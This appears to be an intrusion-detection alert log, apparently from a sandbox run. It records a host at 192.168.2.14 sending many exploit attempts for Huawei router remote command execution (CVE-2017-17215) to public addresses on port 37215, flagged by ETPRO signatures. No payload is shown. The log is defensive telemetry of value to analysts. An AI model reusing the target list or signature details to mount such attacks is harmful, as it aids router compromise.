                                                    07/10/24-08:27:07.335477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356237215192.168.2.1434.94.237.195
                                                    07/10/24-08:26:23.352654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249037215192.168.2.14197.215.225.188
                                                    07/10/24-08:26:36.422019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559837215192.168.2.1441.171.225.92
                                                    07/10/24-08:26:53.147392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857637215192.168.2.14197.122.30.154
                                                    07/10/24-08:26:25.473474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678237215192.168.2.1441.53.229.245
                                                    07/10/24-08:27:19.353550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626437215192.168.2.1441.76.184.61
                                                    07/10/24-08:27:22.929011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703837215192.168.2.14197.152.77.141
                                                    07/10/24-08:27:27.072006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890837215192.168.2.1441.50.69.188
                                                    07/10/24-08:27:27.121135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503037215192.168.2.14177.8.140.201
                                                    07/10/24-08:26:49.849524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.14197.218.215.212
                                                    07/10/24-08:26:36.376968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932437215192.168.2.14197.146.203.70
                                                    07/10/24-08:26:57.501459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530437215192.168.2.1441.253.172.127
                                                    07/10/24-08:26:33.204295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188837215192.168.2.14157.21.183.234
                                                    07/10/24-08:26:33.228280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752437215192.168.2.14175.25.61.115
                                                    07/10/24-08:26:11.446922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134837215192.168.2.14210.21.110.251
                                                    07/10/24-08:26:25.479456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346237215192.168.2.14197.180.234.31
                                                    07/10/24-08:27:28.165302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310837215192.168.2.1441.250.216.115
                                                    07/10/24-08:26:13.825093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138637215192.168.2.1441.188.229.131
                                                    07/10/24-08:26:36.409717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581837215192.168.2.1441.2.185.115
                                                    07/10/24-08:27:13.879292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3745437215192.168.2.14157.0.176.93
                                                    07/10/24-08:27:10.554051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807437215192.168.2.1453.120.106.194
                                                    07/10/24-08:26:49.859593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774437215192.168.2.14157.41.81.10
                                                    07/10/24-08:27:24.886736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.14197.19.167.187
                                                    07/10/24-08:26:28.712584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265237215192.168.2.1442.120.138.228
                                                    07/10/24-08:27:22.479791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817837215192.168.2.14157.56.186.37
                                                    07/10/24-08:26:13.838798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527037215192.168.2.1458.146.172.194
                                                    07/10/24-08:26:49.778030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180437215192.168.2.1441.31.145.234
                                                    07/10/24-08:26:15.840826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543637215192.168.2.1441.108.248.251
                                                    07/10/24-08:26:57.625074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035037215192.168.2.14197.171.213.254
                                                    07/10/24-08:26:57.501573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825037215192.168.2.14197.184.89.174
                                                    07/10/24-08:26:59.856885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918237215192.168.2.14197.88.162.155
                                                    07/10/24-08:26:14.821697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472037215192.168.2.14157.27.101.81
                                                    07/10/24-08:26:15.858543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546237215192.168.2.14197.80.190.31
                                                    07/10/24-08:26:20.185610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805437215192.168.2.1418.164.216.241
                                                    07/10/24-08:26:25.514525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697837215192.168.2.14157.162.84.240
                                                    07/10/24-08:26:45.611390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708637215192.168.2.14180.101.33.131
                                                    07/10/24-08:27:23.501791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584237215192.168.2.1441.100.120.17
                                                    07/10/24-08:26:59.839677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3611237215192.168.2.14157.115.51.134
                                                    07/10/24-08:27:07.389175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117037215192.168.2.14103.254.41.232
                                                    07/10/24-08:26:28.915046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110037215192.168.2.14126.48.65.236
                                                    07/10/24-08:26:43.542796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.1441.92.136.200
                                                    07/10/24-08:26:13.664238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596637215192.168.2.1441.88.70.4
                                                    07/10/24-08:26:23.358336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484237215192.168.2.14197.135.94.96
                                                    07/10/24-08:26:47.864255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447037215192.168.2.14157.31.6.189
                                                    07/10/24-08:27:10.609289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847637215192.168.2.14128.254.77.231
                                                    07/10/24-08:27:22.849785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820837215192.168.2.1441.73.254.80
                                                    07/10/24-08:26:34.239343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994237215192.168.2.14157.131.52.255
                                                    07/10/24-08:26:28.651125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673237215192.168.2.14157.91.133.43
                                                    07/10/24-08:27:05.121517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327637215192.168.2.14157.192.249.123
                                                    07/10/24-08:27:20.477184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400037215192.168.2.14157.176.6.62
                                                    07/10/24-08:26:49.842206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751837215192.168.2.14197.96.62.100
                                                    07/10/24-08:27:31.532257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654037215192.168.2.14197.150.218.134
                                                    07/10/24-08:26:43.668862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365437215192.168.2.14157.250.123.102
                                                    07/10/24-08:26:18.014654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826837215192.168.2.14197.97.126.193
                                                    07/10/24-08:26:49.762631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601437215192.168.2.14197.10.9.91
                                                    07/10/24-08:26:13.761894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350637215192.168.2.14157.17.22.189
                                                    07/10/24-08:26:47.943853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054437215192.168.2.1441.137.71.119
                                                    07/10/24-08:27:05.209261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078037215192.168.2.14156.164.18.47
                                                    07/10/24-08:26:36.424272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719237215192.168.2.14153.23.130.187
                                                    07/10/24-08:27:19.298148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.14197.36.151.51
                                                    07/10/24-08:26:49.845196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631037215192.168.2.1441.170.107.156
                                                    07/10/24-08:26:22.289116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913437215192.168.2.14151.247.105.18
                                                    07/10/24-08:26:45.652224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838837215192.168.2.14157.41.129.130
                                                    07/10/24-08:26:33.217232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044037215192.168.2.14157.64.140.189
                                                    07/10/24-08:27:27.169986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207637215192.168.2.1441.6.114.98
                                                    07/10/24-08:26:14.757846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.14124.131.154.65
                                                    07/10/24-08:26:51.932458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114237215192.168.2.14157.216.133.206
                                                    07/10/24-08:26:59.701278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866837215192.168.2.14178.18.102.126
                                                    07/10/24-08:27:23.946420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759237215192.168.2.14143.174.134.68
                                                    07/10/24-08:26:55.471512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617237215192.168.2.14152.77.74.213
                                                    07/10/24-08:27:30.479166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376637215192.168.2.1441.214.169.67
                                                    07/10/24-08:26:14.622082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028837215192.168.2.14189.9.50.106
                                                    07/10/24-08:26:34.190813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758037215192.168.2.1441.149.103.235
                                                    07/10/24-08:27:31.479200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317837215192.168.2.14157.202.73.41
                                                    07/10/24-08:26:28.926952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942237215192.168.2.14157.96.199.7
                                                    07/10/24-08:26:57.574047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291437215192.168.2.14221.36.252.39
                                                    07/10/24-08:26:43.574763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818037215192.168.2.1441.78.69.95
                                                    07/10/24-08:27:13.850530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090037215192.168.2.14136.106.68.74
                                                    07/10/24-08:27:31.533375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211237215192.168.2.1441.112.246.154
                                                    07/10/24-08:26:36.373658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374037215192.168.2.14157.125.137.88
                                                    07/10/24-08:27:30.558808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6012637215192.168.2.14110.137.196.250
                                                    07/10/24-08:27:32.532227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525037215192.168.2.14157.95.172.155
                                                    07/10/24-08:26:41.598606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.1441.87.5.255
                                                    07/10/24-08:26:42.393770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850237215192.168.2.14140.35.214.245
                                                    07/10/24-08:27:23.887861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471237215192.168.2.1441.57.131.187
                                                    07/10/24-08:26:43.670311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856237215192.168.2.14197.222.212.193
                                                    07/10/24-08:26:49.762632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189637215192.168.2.1441.142.150.47
                                                    07/10/24-08:27:14.867755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522637215192.168.2.14157.84.175.54
                                                    07/10/24-08:26:33.208753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060437215192.168.2.1441.216.167.96
                                                    07/10/24-08:26:15.800332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676237215192.168.2.14157.30.9.250
                                                    07/10/24-08:26:42.426125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587437215192.168.2.1441.81.117.118
                                                    07/10/24-08:26:55.410350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5268437215192.168.2.14157.85.54.251
                                                    07/10/24-08:26:29.812084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073637215192.168.2.1441.183.173.67
                                                    07/10/24-08:27:10.727335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517437215192.168.2.14157.56.250.197
                                                    07/10/24-08:27:20.470847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188237215192.168.2.1441.179.79.226
                                                    07/10/24-08:27:11.519267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266637215192.168.2.14157.85.73.162
                                                    07/10/24-08:26:59.714271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.1441.127.37.12
                                                    07/10/24-08:27:30.510690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507037215192.168.2.14143.41.112.140
                                                    07/10/24-08:26:57.513977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553837215192.168.2.14197.96.169.159
                                                    07/10/24-08:26:59.771791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810437215192.168.2.1441.209.225.136
                                                    07/10/24-08:27:20.509874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445037215192.168.2.1492.8.254.208
                                                    07/10/24-08:27:11.489140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864637215192.168.2.1445.215.20.215
                                                    07/10/24-08:27:19.324421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529037215192.168.2.14157.151.127.120
                                                    07/10/24-08:26:42.421104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611237215192.168.2.14118.51.35.205
                                                    07/10/24-08:27:22.910234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414037215192.168.2.14191.62.9.238
                                                    07/10/24-08:26:26.528508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214437215192.168.2.14197.51.157.173
                                                    07/10/24-08:26:43.885444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772437215192.168.2.14157.11.60.145
                                                    07/10/24-08:27:23.959862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599437215192.168.2.14197.243.19.5
                                                    07/10/24-08:27:02.975587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512837215192.168.2.14197.237.186.209
                                                    07/10/24-08:27:10.641712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618037215192.168.2.14157.236.33.64
                                                    07/10/24-08:27:17.027039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297837215192.168.2.1487.196.83.231
                                                    07/10/24-08:26:41.454005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617837215192.168.2.14157.12.243.202
                                                    07/10/24-08:26:59.853365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666437215192.168.2.14197.73.120.140
                                                    07/10/24-08:27:23.928325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413237215192.168.2.1487.155.8.174
                                                    07/10/24-08:27:27.131839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359637215192.168.2.149.100.123.151
                                                    07/10/24-08:27:19.230409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102237215192.168.2.14157.174.42.137
                                                    07/10/24-08:27:02.898852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637437215192.168.2.14121.155.215.140
                                                    07/10/24-08:27:22.748001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494237215192.168.2.14197.85.44.196
                                                    07/10/24-08:27:24.891273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569837215192.168.2.14167.171.114.169
                                                    07/10/24-08:26:13.645814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011437215192.168.2.14151.236.43.241
                                                    07/10/24-08:26:28.877941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114037215192.168.2.14203.243.169.147
                                                    07/10/24-08:26:57.514091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111837215192.168.2.14197.39.16.239
                                                    07/10/24-08:26:49.783625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723637215192.168.2.1441.65.64.216
                                                    07/10/24-08:27:10.556595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129637215192.168.2.14157.234.148.63
                                                    07/10/24-08:27:33.758146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466837215192.168.2.14197.113.176.125
                                                    07/10/24-08:27:20.387304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896837215192.168.2.14210.214.209.12
                                                    07/10/24-08:27:22.839204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407837215192.168.2.14197.108.121.37
                                                    07/10/24-08:26:22.273288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429637215192.168.2.14157.50.129.137
                                                    07/10/24-08:26:29.863602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428837215192.168.2.14200.153.168.242
                                                    07/10/24-08:26:22.260584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321437215192.168.2.1441.16.210.150
                                                    07/10/24-08:26:33.256885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4496437215192.168.2.14157.7.214.60
                                                    07/10/24-08:26:11.178484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619437215192.168.2.14157.29.80.97
                                                    07/10/24-08:26:57.659846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683437215192.168.2.14157.162.100.151
                                                    07/10/24-08:26:13.741035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434237215192.168.2.14157.16.75.176
                                                    07/10/24-08:26:34.242902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604437215192.168.2.1436.200.50.55
                                                    07/10/24-08:27:07.272369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418637215192.168.2.14205.60.29.54
                                                    07/10/24-08:26:11.524637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306237215192.168.2.1441.65.39.223
                                                    07/10/24-08:26:33.231407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985837215192.168.2.1441.200.159.60
                                                    07/10/24-08:26:25.528044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654637215192.168.2.14204.107.152.212
                                                    07/10/24-08:26:20.177629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352437215192.168.2.1460.91.153.152
                                                    07/10/24-08:27:19.219162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234237215192.168.2.1481.79.209.24
                                                    07/10/24-08:26:13.838798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510237215192.168.2.14116.159.204.163
                                                    07/10/24-08:26:36.372263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491437215192.168.2.14197.194.206.133
                                                    07/10/24-08:26:47.821658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030437215192.168.2.1441.210.180.13
                                                    07/10/24-08:26:25.449371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086437215192.168.2.14168.81.17.84
                                                    07/10/24-08:26:15.877145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188437215192.168.2.14157.169.153.243
                                                    07/10/24-08:26:57.630985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445637215192.168.2.1441.46.114.215
                                                    07/10/24-08:27:27.155476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394037215192.168.2.1441.113.61.103
                                                    07/10/24-08:26:43.888378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123437215192.168.2.14197.163.107.215
                                                    07/10/24-08:26:49.833735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097037215192.168.2.1463.43.197.31
                                                    07/10/24-08:26:14.764309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961837215192.168.2.1441.90.89.131
                                                    07/10/24-08:27:24.860339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.14105.147.35.133
                                                    07/10/24-08:26:47.890568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549837215192.168.2.14197.46.162.26
                                                    07/10/24-08:26:14.798571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5686237215192.168.2.14197.124.185.91
                                                    07/10/24-08:26:41.334232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929037215192.168.2.14173.245.37.232
                                                    07/10/24-08:26:41.354295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028237215192.168.2.14157.10.226.35
                                                    07/10/24-08:26:22.224405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371437215192.168.2.1441.137.103.222
                                                    07/10/24-08:26:49.855316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798637215192.168.2.14197.72.9.136
                                                    07/10/24-08:26:28.858980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630037215192.168.2.14197.79.148.125
                                                    07/10/24-08:26:28.890895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839237215192.168.2.14157.51.166.243
                                                    07/10/24-08:27:19.224532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629237215192.168.2.14157.57.253.28
                                                    07/10/24-08:27:24.929002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873037215192.168.2.1441.191.17.245
                                                    07/10/24-08:26:23.355278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748437215192.168.2.1448.240.164.56
                                                    07/10/24-08:26:38.605260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949437215192.168.2.1441.7.18.228
                                                    07/10/24-08:27:22.905348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076037215192.168.2.14197.54.210.1
                                                    07/10/24-08:26:36.440849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226637215192.168.2.14197.142.245.197
                                                    07/10/24-08:26:41.378984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715437215192.168.2.14157.211.44.106
                                                    07/10/24-08:26:45.630822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588637215192.168.2.14197.50.19.57
                                                    07/10/24-08:26:22.290741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490037215192.168.2.14197.5.241.113
                                                    07/10/24-08:27:28.088837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111037215192.168.2.14197.48.103.154
                                                    07/10/24-08:26:28.788694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175637215192.168.2.1441.198.154.130
                                                    07/10/24-08:27:34.118425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150037215192.168.2.14197.116.44.29
                                                    07/10/24-08:26:33.165802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346237215192.168.2.14197.27.253.134
                                                    07/10/24-08:26:38.657439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917237215192.168.2.14198.93.148.255
                                                    07/10/24-08:26:17.972385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960237215192.168.2.1461.144.149.243
                                                    07/10/24-08:27:31.571103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784637215192.168.2.14197.243.194.11
                                                    07/10/24-08:26:13.646644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956637215192.168.2.14197.67.117.245
                                                    07/10/24-08:27:34.117995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099837215192.168.2.14157.212.120.194
                                                    07/10/24-08:26:13.659815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477437215192.168.2.1441.18.203.174
                                                    07/10/24-08:26:43.663185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098237215192.168.2.1441.178.141.239
                                                    07/10/24-08:26:17.949635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237637215192.168.2.14157.241.116.244
                                                    07/10/24-08:27:32.597902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270237215192.168.2.14197.44.228.171
                                                    07/10/24-08:26:13.700547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141037215192.168.2.14121.184.217.108
                                                    07/10/24-08:26:23.320744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129237215192.168.2.14157.6.27.16
                                                    07/10/24-08:26:25.423128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269637215192.168.2.14208.32.70.139
